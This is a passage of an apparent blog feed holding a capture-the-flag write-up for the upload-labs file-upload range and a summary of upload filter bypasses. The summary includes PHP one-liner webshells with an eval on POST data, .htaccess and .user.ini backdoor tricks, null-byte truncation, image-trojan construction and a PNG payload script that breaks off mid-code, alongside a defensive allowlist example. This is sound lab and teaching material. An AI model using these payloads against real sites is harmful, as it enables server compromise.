webshell errors during generation, apparently because of the quotes</p><p><img src="/2022/07/18/upload-labs/4e80458fb5872a86f092dde67eef7d46.png" alt="screenshot"></p><p>Success</p><p><img src="/2022/07/18/upload-labs/eb2bd79aaa0844340a7375c57c0b332f.png" alt="screenshot"></p><br><h3 id="pass-17:"><a href="#pass-17:" class="headerlink" title="pass 17:"></a>pass 17:</h3><p><img src="/2022/07/18/upload-labs/bae494818b93d13437609c51bca8211d.png" alt="screenshot"></p><p>We are asked to audit the code directly, so start from the code</p><p><img src="/2022/07/18/upload-labs/77f1f25dbd799920398efef9eaa742e1.png" alt="screenshot"></p><p>The code is simple: it extracts information from the file name without validating it, uploads, renames after upload, and unlinks the source file. Even an illegal file is uploaded to the server before being deleted</p><p>A simple method is an image webshell, which can get a shell</p><p><img src="/2022/07/18/upload-labs/4947487161a84c4830bda39a2c972380.png" alt="screenshot"></p><p>But that is not the intended test point</p><p>Because any file can be uploaded, we can use a race condition: access the illegal file immediately, and once the access succeeds it cannot be deleted.</p><p>About race conditions</p><p>A race-condition upload is a server-side vulnerability caused by unreasonable operation logic in the back end.<br>Because the server handles different users' requests concurrently, improper concurrency handling or badly ordered operation logic leads to this class of problem. It typically occurs when multiple threads access the same shared code, variable or file without locking or synchronisation.</p><p>It occurs when multiple threads access the same shared code, variables or files without locks or synchronisation. In other words, we upload the PHP file successfully but the back end deletes it shortly afterwards, so we must access the file before it is deleted, just as deleting a file while it is open is refused with a "file is open" message, which prevents the deletion.</p><p>Send requests continuously with Burp while continuously accessing the file in the browser (the original name works), and there is a chance to connect</p><p><img src="/2022/07/18/upload-labs/fa98d15bffbee59563ab79c835eee62c.png" alt="screenshot"></p><p>AntSword can also connect this way by clicking repeatedly, but the backdoor file is still deleted and does not persist, so the connection is unstable</p><p><img src="/2022/07/18/upload-labs/ced92528861948eaa19362ddc7fe6a13.png" alt="screenshot"></p><br><h3 id="pass-18:"><a href="#pass-18:" class="headerlink" title="pass 18:"></a>pass 18:</h3><p><img src="/2022/07/18/upload-labs/42cc5e1b2f94bf71821372b2cfa2b27c.png" alt="screenshot"></p><p>The earlier image webshell connects directly</p><p>Even the plainest image webshell gets through, because there is no second rendering (as the code also shows)</p><p><img src="/2022/07/18/upload-labs/bd35a3d95484261ba246f327dcca63db.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/2e75f3d32e52049e2ec46e455a640cbe.png" alt="screenshot"></p><p>This level actually adds a whitelist check plus checks on image size and existence, then uploads and renames. Each step returns a detailed error on failure. Validating before the upload stops us from racing to access an uploaded .php, so consider racing to access an uploaded image webshell before it is renamed, or simply uploading an image webshell from the start</p><p>The race-condition approach gets in</p><p><img src="/2022/07/18/upload-labs/e5abacb1b3873051088e05c1b4050368.png" alt="screenshot"></p><p>Success</p><p><img src="/2022/07/18/upload-labs/9daa741828b9afbd1e834a1aae3eebb2.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/4b948daf3ff66fc0b239064ca9335776.png" alt="screenshot"></p><h3 id="pass-19:"><a href="#pass-19:" class="headerlink" title="pass 19:"></a>pass 19:</h3><p>Source:</p><p><img src="/2022/07/18/upload-labs/1f49e9ff25efc707339774cd5a9b4fed.png" alt="screenshot"></p><p>The uploaded file name is sent via POST, and the blacklist only does a simple extension check on that POSTed name, with no filtering of dots, spaces and the like</p><p>Just change the "save name" box to bypass it, or edit the corresponding save name form field in Burp</p><p><img src="/2022/07/18/upload-labs/c9b43ef7ff83f194f8c40fead649b255.png" alt="screenshot"></p><p>Success</p><p><img src="/2022/07/18/upload-labs/78159f7563ca50ae92fa779de8c7267a.png" alt="screenshot"></p><p>References: <a href="https://blog.csdn.net/qq_50673174/article/details/124760011">https://blog.csdn.net/qq_50673174/article/details/124760011</a></p><p><a href="https://blog.csdn.net/weixin_45588247/article/details/119177948">https://blog.csdn.net/weixin_45588247/article/details/119177948</a></p>]]></content>
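Added defensive example (not upload-labs code) that reconstructs in Python the single-pass blacklist pipelines the writeup describes for pass 9 and pass 10, so the file names from the writeup can be traced through them, beside an allowlist check with server-generated names that none of those names pass. The blacklist contents and their order are a constructed approximation of the lab's lists.

```python
import re
import secrets

# Constructed approximation of the lab's blacklist; the real list is longer.
DENY_EXT = [".php", ".php5", ".php4", ".php3", ".phtml", ".phps", ".pht",
            ".htaccess", ".ini"]
# Constructed approximation of the words pass 10 deletes, in the order it tries them.
DENY_WORDS = ["php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht",
              "jsp", "jspa", "jspx", "asp", "aspx", "ini", "htaccess"]
# Allowlist for the hardened check: image extensions only.
ALLOW_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def blacklist_extension_check(filename):
    """Pass-9 style single pass: trim, strip trailing dots, take the text after
    the last dot, lowercase, drop ::$DATA, trim, then compare with the blacklist.
    Returns (extension_as_compared, accepted, name_written_to_disk)."""
    name = filename.strip()                                    # trim()
    name = name.rstrip(".")                                    # deldot()
    ext = name[name.rfind("."):] if "." in name else ""        # strrchr($name, '.')
    ext = ext.lower()                                          # strtolower()
    ext = re.sub(re.escape("::$DATA"), "", ext, flags=re.IGNORECASE)  # str_ireplace()
    ext = ext.strip()                                          # trim()
    return ext, ext not in DENY_EXT, name


def blacklist_delete_check(filename):
    """Pass-10 style: every blacklisted word is removed once, left to right, with
    no rescan, so a word split around a deleted copy reassembles afterwards."""
    name = filename.strip()
    for word in DENY_WORDS:
        name = re.sub(re.escape(word), "", name, flags=re.IGNORECASE)
    return name


def allowlist_name(filename):
    """Hardened form: reject NUL bytes (the %00 truncation), accept only
    'stem.ext' with a safe stem and an allowlisted image extension, and never
    reuse the client's name: the stored name is random, so no blacklist is needed."""
    if "\x00" in filename:
        raise ValueError("NUL byte in file name")
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    parts = base.split(".")
    if len(parts) != 2:                                     # exactly one extension
        raise ValueError("expected exactly one extension: %r" % base)
    stem, ext = parts[0], "." + parts[1].lower()
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem) or ext not in ALLOW_EXT:
        raise ValueError("file name not allowed: %r" % base)
    return secrets.token_hex(8) + ext


def allowed(filename):
    """True if allowlist_name would accept the name."""
    try:
        allowlist_name(filename)
        return True
    except ValueError:
        return False
```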
<summary type="html"><p>Writeup for the upload-labs file-upload range</p></summary>
<category term="wp" scheme="http://example.com/tags/wp/"/>
<category term="upload-labs" scheme="http://example.com/tags/upload-labs/"/>
</entry>
<entry>
<title>File upload notes</title>
<link href="http://example.com/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<id>http://example.com/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</id>
<published>2022-07-18T15:05:58.000Z</published>
<updated>2022-12-31T16:59:52.475Z</updated>
<content type="html"><![CDATA[<p>做完文件上传靶场upload-labs题目后,进行的一些归纳总结</p><span id="more"></span><p>最近一周刷完了upload-labs,简单总结一下我学到的一些文件上传绕过姿势</p><p><strong>思维导图</strong></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220725222936354.png" alt="image-20220725222936354"></p><h3 id="一,绕过"><a href="#一,绕过" class="headerlink" title="一,绕过"></a>一,绕过</h3><h4 id="1-js验证"><a href="#1-js验证" class="headerlink" title="1.js验证"></a>1.js验证</h4><p> js就是我们熟知的JavaScript,一般运行在客户端,node.js才是运行在服务端的。<br> 看到有句话说的好,一切前端js验证都是纸老虎。</p><p>绕过很简单:</p><p>1.他是运行在你的客户端的,我们可以关闭本地js,比如用bp(burpsuite)就可以自动去除js。不过一般前端验证成功后才发送数据包让bp截取,也可以直接浏览器禁止掉js运行</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717180604210.png" alt="image-20220717180604210"></p><p>2.f12进开发者页面可以直接看js代码并且可以修改,删除验证比添加文件类型好用点,添加完要刷新重新运行一遍</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717182638793.png" alt="image-20220717182638793"></p><h4 id="2-MIME类型验证"><a href="#2-MIME类型验证" class="headerlink" title="2.MIME类型验证"></a>2.MIME类型验证</h4><p> 主要进行验证的代码类似以下这句:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717183028164.png" alt="image-20220717183028164"></p><p> 关于php的files数组一些前置知识,很常用</p><blockquote><p>$_FILES数组内容如下:</p><p>< input type=”file” name=”userfile” ></p><p>$_FILES[‘userfile’][‘name’] 客户端文件原称。</p><p>$_FILES[‘userfile’][‘type’] <strong>文件的 MIME 类型</strong>,需要浏览器提供该信息的支持,例如“image/gif”。</p><p>$_FILES[‘userfile’][‘size’] 已上传文件大小,单位字节(Byte)。</p><p>$_FILES[‘userfile’][‘tmp_name’] 文件上传后在服务端储存的临时文件名。</p><p>$_FILES[‘userfile’][‘error’] 和该文件上传相关的错误代码。[‘error’] 是在 PHP 4.2.0 版本中增加的。<br>注: 在 PHP 4.1.0 版本以前该数组的名称为 $HTTP_POST_FILES,它并不像 $_FILES 一样是自动全局变量。PHP 3 不支持 $HTTP_POST_FILES 数组。</p></blockquote><blockquote><p>move_uploaded_file – 将上传的文件移动到新位置<br>说明:<br>bool move_uploaded_file ( string filename, string 
destination )<br>本函数检查并确保由 filename 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST 上传机制所上传的)。如果文件合法,则将其移动为由 destination 指定的文件。</p><p>如果 filename 不是合法的上传文件,不会出现任何操作,move_uploaded_file() 将返回 FALSE。</p><p>如果 filename 是合法的上传文件,但出于某些原因无法移动,不会出现任何操作,move_uploaded_file() 将返回 FALSE。此外还会发出一条警告。</p><p>这种检查显得格外重要,如果上传的文件有可能会造成对用户或本系统的其他用户显示其内容的话</p></blockquote><p> 绕过很简单了,数据包修改content-type块,可以改为image/jpeg</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717183752584.png" alt="image-20220717183752584"></p><h4 id="3-拓展名绕过"><a href="#3-拓展名绕过" class="headerlink" title="3.拓展名绕过"></a>3.拓展名绕过</h4><p> exif_imagetype函数功能是读取一个图像的第一个字节并检查其签名</p><p> 主要是针对使用黑名单但是没有禁用完后缀名的</p><p> 一些文件后缀名的拓展名比如phtml依旧解析为php</p><p> 简单举例但是不全:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717184218012.png" alt="image-20220717184218012"></p><p>pht也是</p><h5 id="htaccess文件"><a href="#htaccess文件" class="headerlink" title=".htaccess文件"></a>.htaccess文件</h5><p> <strong>.htaccess是针对apache的</strong></p><p> 或者没有过滤掉.htaccess文件</p><p> .htaccess文件( 全称 “分布式配置文件” ),英文全称 Hypertext Access (超文本入口)。提供了针对目录改变配置的方法, 即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过 Apache 的 AllowOverride 指令来设置。</p><p>简单来说他是apache的配置文件,满足”</p><p>1.Allow Override All;</p><p>2.LoadModule rewrite_module modules/mod_rewrite.so #rewrite模块为开启状态。</p><p>“两个条件后可以上传.hataccess文件修改配置</p><p>注意:</p><p>注意php的版本,nts 意思是即非线程安全,不提供数据访问保护,不支持使用 .htaccess</p><p>需要配置apache</p><p>httpd.conf</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717184717759.png" alt="image-20220717184717759"></p><p>.htaccess文件内容</p><p><code>AddType application/x-httpd-php .jpg</code> </p><p> 把jpg文件当作php文件解析,不加.jpg就是把所有文件当php文件解析</p><p> 上传.htaccess后我们把shell.php改个后缀(这里为.jpg)上传就行了</p><h5 id="user-ini(后续精炼一下)"><a href="#user-ini(后续精炼一下)" class="headerlink" 
title=".user.ini(后续精炼一下)"></a>.user.ini(后续精炼一下)</h5><p>应用相比于<code>.htaccess</code>用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。</p><p>php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:<code>PHP_INI_SYSTEM</code>、<code>PHP_INI_PERDIR</code>、<code>PHP_INI_ALL</code>、<code>PHP_INI_USER</code>。</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/2014103002272568560.png" alt="enter image description here"></p><p>除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录(<code>$_SERVER['DOCUMENT_ROOT']</code> 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。</p><p>在 <code>.user.ini</code> 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。</p><p>这里就很清楚了,<code>.user.ini</code>实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)</p><p>实际上,除了<code>PHP_INI_SYSTEM</code>以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。</p><p>而且,和<code>php.ini</code>不同的是,<code>.user.ini</code>是一个能被动态加载的ini文件。也就是说我修改了<code>.user.ini</code>后,不需要重启服务器中间件,只需要等待<code>user_ini.cache_ttl</code>所设置的时间(默认为300秒),即可被重新加载。</p><p>然后我们看到php.ini中的配置项,可惜我沮丧地发现,只要稍微敏感的配置项,都是<code>PHP_INI_SYSTEM</code>模式的(甚至是php.ini only的),包括<code>disable_functions</code>、<code>extension_dir</code>、<code>enable_dl</code>等。 不过,我们可以很容易地借助<code>.user.ini</code>文件来构造一个“后门”。</p><p>指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_prepend_file=01.gif</span><br></pre></td></tr></table></figure><p>原因: .user.ini中auto prepend_file=xxx.jpg会在执行index.php前把xxx.jpg包含进来,且解析为php格式</p><p>那么,我们可以猥琐地想一下,在哪些情况下可以用到这个姿势? 
For example, a site forbids uploading .php files: upload a .user.ini, then upload an image trojan, and the prepend includes it and gets you a shell. The prerequisite is that the folder holding .user.ini contains a real PHP file that gets executed; otherwise nothing triggers the include. Or, if you just want to hide a backdoor, this is the most convenient way.</p><h4 id="4-验证机制绕过"><a href="#4-验证机制绕过" class="headerlink" title="4. Bypassing the validation logic"></a>4. Bypassing the validation logic</h4><p>The simplest case is incomplete filtering of special characters in the filename.</p><p>A fairly complete filter looks like this:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717190812860.png" alt="image-20220717190812860"></p><p>trim() removes whitespace (or other listed characters) from both ends of a string.</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717190918400.png" alt="image-20220717190918400"></p><p>Trailing dots are stripped from the whole filename (defeats the shell.php. trick of appending a dot).</p><p>strrchr() returns the part of the string from the last . onward, i.e. the extension.</p><p>The extension is then normalised: lower-cased (defeats the case bypass, shell.PHP); the string ::$DATA is removed (defeats the NTFS data-stream disguise, shell.php::$DATA); surrounding spaces are trimmed (defeats the trailing-space bypass).</p><p>Note: a trailing . or space typed into the filename locally is dropped by the OS before the request is sent, so modify the multipart request in Burp instead.</p><p><strong>Summary: 1. append a dot (.); 2. append a space; 3. change the case; 4. append ::$DATA</strong></p><p>Why it works:</p><p>1. When Windows creates a file it drops trailing dots and spaces, and its filesystem is case-insensitive, so a name that slips past a blacklist comparison still ends up on disk as an ordinary shell.php that the PHP handler executes.</p><p>2. On Windows, appending "::$DATA" to a filename makes everything after ::$DATA be treated as an NTFS data stream; the extension is not inspected and the name before ::$DATA is kept, which is exactly what we need when the extension check is what we are avoiding.</p><p>If the filter is incomplete, attack whatever it leaves out; if it is complete but each normalisation runs only once, attack the logic of that single pass.</p><p>For example shell.php. . (dot, space, dot): stripping one dot and then the space leaves shell.php., which still passes the blacklist check and is saved; Windows then drops the final dot.</p><p>Another option is shell.php::::$DATA$DATA (double-write bypass: one pass of str_ireplace removes the inner ::$DATA and leaves ::$DATA behind).</p><p>If the filter simply deletes a blacklisted extension from the filename:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717193232330.png" alt="image-20220717193232330"></p><p>double-write it, e.g. .pphphtml, which the single deletion pass turns into .phtml.</p><h4 id="5-上传路径可控"><a href="#5-上传路径可控" class="headerlink" title="5. Controllable upload path"></a>5. Controllable upload path</h4><p>Whether the upload path comes from GET or POST, we can control it with a %00 truncation of the string, so the uploaded file is not renamed (strictly it is renamed, but if it can be downloaded or the page records it, the new name is visible anyway).</p><p>For GET, edit the URL directly; for POST, edit either the path text or its hex value in the request body.</p><p>One more point: the %00 only becomes a real null byte if something URL-decodes it. A GET parameter is decoded by the server; a POST body value is taken literally, so when the value is not part of the URL you must decode the %00 yourself (URL-decode it in Burp, or edit the hex) so that a raw 0x00 byte is sent.</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194656166.png" alt="image-20220717194656166"></p><p>Editing the hex directly works too: a + (a space in URL encoding, %2b when encoded itself) is placed only as a marker for where the 00 byte goes.</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194728843.png" alt="image-20220717194728843"></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194013902.png" alt="image-20220717194013902"></p><p>For example, if save_path is changed to upload/1.php%00, the code intends to treat 1.php as a folder and move the renamed file into it;</p><p>but once the string is truncated at the null byte, the upload path img_path becomes upload/1.php, so the file lands in the upload folder under the name 1.php.</p><p>Note: this %00 truncation only works on PHP older than 5.3.4 (which started rejecting paths that contain a null byte), and php.ini must have magic_quotes_gpc=Off, otherwise the null byte in GET/POST data is escaped.</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194445837.png" alt="image-20220717194445837"></p><blockquote><p>URL encodings of some common special characters</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717194849735.png" alt="image-20220717194849735"></p></blockquote><h4 id="6-文件名可控"><a href="#6-文件名可控" class="headerlink" title="6. Controllable filename"></a>6. Controllable filename</h4><p>upload-labs pass19 only validates the name the file is saved under, so a bypass of the save name is all that is needed.</p><p>Mainly, combine the extension tricks with the validation-logic bypasses above.</p><h4 id="7-其他验证机制"><a href="#7-其他验证机制" class="headerlink" title="7. Other validation"></a>7. Other validation</h4><p>A common habit is to prepend GIF89a to the file to get past PHP's getimagesize() check, which only sniffs the leading bytes.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// one-liner shell in .phtml form: phtml is PHP embedded in HTML</span><br><span class="line">GIF89a</span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">language</span>=<span class="string">'php'</span>></span><span class="language-javascript">@<span class="built_in">eval</span>($_POST[shell]);</span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">language</span>=<span class="string">'php'</span>></span><span class="language-javascript"><span class="title function_">system</span>(<span class="string">'cat /flag'</span>);</span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure><p>Note: the <code>script language='php'</code> tag syntax was removed in PHP 7.0, so this form only runs on PHP 5.x.</p><p>Also, <strong>if characters inside the file are filtered (the usual PHP open tag, for instance), consider the phtml form</strong> (PHP inside HTML tags).</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20221109160912453.png" alt="image-20221109160912453"></p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20221109160926617.png" alt="image-20221109160926617"></p><p>When AntSword or China Chopper cannot connect, it may be the campus network; the same connection works over a phone hotspot.</p><h3 id="二,图片马"><a href="#二,图片马" class="headerlink" title="II. Image trojans"></a>II. Image trojans</h3><p>An image trojan must be paired with a file inclusion vulnerability: the inclusion makes PHP parse the image as PHP, so the malicious PHP code hidden in the image runs.</p><p>php.ini configuration</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200253108.png" alt="image-20220717200253108"></p><p>Code of the vulnerable include file:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717195441481.png" alt="image-20220717195441481"></p><p>The connection URL looks like this:</p><p> <a
href="http://127.0.0.1/upload-labs/include.php?file=./upload/2.jpg">http://127.0.0.1/upload-labs/include.php?file=./upload/2.jpg</a></p><p>When working with the file inclusion lab, switch the PHP version to 5.3 or later.</p><h4 id="1-最普通制作"><a href="#1-最普通制作" class="headerlink" title="1. The plain way"></a>1. The plain way</h4><ul><li><p>Use a hex editor such as WinHex or 010 Editor to insert the PHP code at the very end of the file.</p></li><li><p>Or in cmd: copy 111.jpg/b+shell.php/a 3333.jpg</p><p>(put the PHP second so that the code lands at the end of the file; the usual checks only look at the file header at the front)</p></li></ul><blockquote><p>/b means the file is read as binary</p><p>/a means the file is read as ASCII text (the default)</p></blockquote><p>Result:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200144750.png" alt="image-20220717200144750"></p><p><strong>This bypasses:</strong></p><p>1. Checks that only read the first two bytes (the file-header check)</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717200635334.png" alt="image-20220717200635334"></p><p>2. getimagesize()</p><p>This function reads the leading bytes of the target file and decides from them whether it looks like an image; it never inspects the tail.</p><p>3. exif_imagetype()</p><p>Checks the real format of an image so that merely renaming the extension is not enough.</p><p>Requires the PHP exif extension to be enabled.</p><h4 id="2-绕过二次渲染(待补充)"><a href="#2-绕过二次渲染(待补充)" class="headerlink" title="2. Bypassing secondary rendering (to be completed)"></a>2. Bypassing secondary rendering (to be completed)</h4><p>Server-side re-rendering code:</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717202109699.png" alt="image-20220717202109699"></p><p>After we upload a file, the site post-processes the image (format, size requirements and so on): the server rewrites its contents and, once processing is done, generates a new image from ours and puts it in the page's img tag for display.</p><p>The PHP code at the end of the image trojan built above is simply rendered away, so the file has to be built differently.</p><p>Each image format needs its own construction method.</p><p>GIF is the easiest: compare the uploaded source image with the downloaded result and insert the PHP code at a position that did not change; it may take several attempts and can still fail.</p><p>PNG is more complex; there are two methods, writing into PLTE or into IDAT.</p><p>Writing the script requires more knowledge of the PNG format; to be filled in after studying it, for now use existing scripts.</p><ul><li><p>PLTE (requires an indexed-colour image)</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717215839769.png" alt="image-20220717215839769"></p><p>The main work is computing, with a script, the CRC of the PLTE chunk after the PHP code has been inserted (the CRC covers the chunk type and data) and replacing the old CRC by hand.</p></li><li><p>IDAT</p><p>Use an existing script to generate a PNG whose IDAT contains the chosen code.</p><p>Script (enable the gd extension in php.ini):</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0x0e</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span 
class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x01</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>,</span><br><span class="line"></span><br><span class="line"> <span class="number">0x66</span>, <span class="number">0x44</span>, <span 
class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"></span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span 